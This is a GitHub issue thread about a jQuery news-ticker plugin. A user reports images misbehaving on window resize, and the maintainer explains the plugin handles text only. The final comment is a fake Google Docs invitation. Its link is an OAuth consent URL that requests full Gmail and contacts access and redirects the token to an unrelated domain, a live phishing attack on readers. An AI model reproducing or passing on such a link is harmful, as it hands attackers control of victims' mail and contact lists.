### ISSUE TITLE
Resizing of browser window leading to error

### ISSUE THREAD

**Issue by aashraybhandar1** [Frogmouth/jquery.tickerNews#3]
On resizing the browser window abnormalities are there.On refreshing the window it becomes fine again.Kindly help.

**Comment by Frogmouth** [comment]
Hi mate,
i need more information about the issue.

What do you mean with"abnormalities"?
In which browser you occure in the issue?
Do you occure in some error in console?
Maybe some screencap or link are useful to understand the problem.

**Comment by aashraybhandar1** [comment]
Hi,

Thanks for such a quick reply. I'm currently using it with images . so when
I resize the browser window some of the images stop coming in the resized
window. And also there is empty space between the last image and the first
image.  The problem however goes on refreshing the resized window.

Hi mate,
i need more information about the issue.

What do you mean with"abnormalities"?
In which browser you occure in the issue?
Do you occure in some error in console?
Maybe some screencap or link are useful to understand the problem.

—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/Frogmouth/jquery.tickerNews/issues/3#issuecomment-227125246,
or mute the thread
https://github.com/notifications/unsubscribe/AMYYeX4CvdEGffbLfsObHmyjHSPfZd3Wks5qNoOlgaJpZM4I5l5Q
.

**Comment by Frogmouth** [comment]
I'm so sorry.
The plugin is designed to work with text only, the images' management introduces a lot of variables that aren't in the script's scope. Maybe you are looking for an images carusel or a image slider.

**Comment by aashraybhandar1** [comment]
Ya I actually wanted a marque like plug-in  and the effect generated here
is pretty cool.  Anyway thanks a lot for your time

**Comment by Frogmouth** [comment]
;) you are welcome!

**Comment by aashraybhandar1** [comment]
Aashray Bhandari has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=346348828325-vlpb3e70lp89pd823qrcb9jfsmu556t8.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.g-cloud.pro%2Fg.php&customparam=customparam>
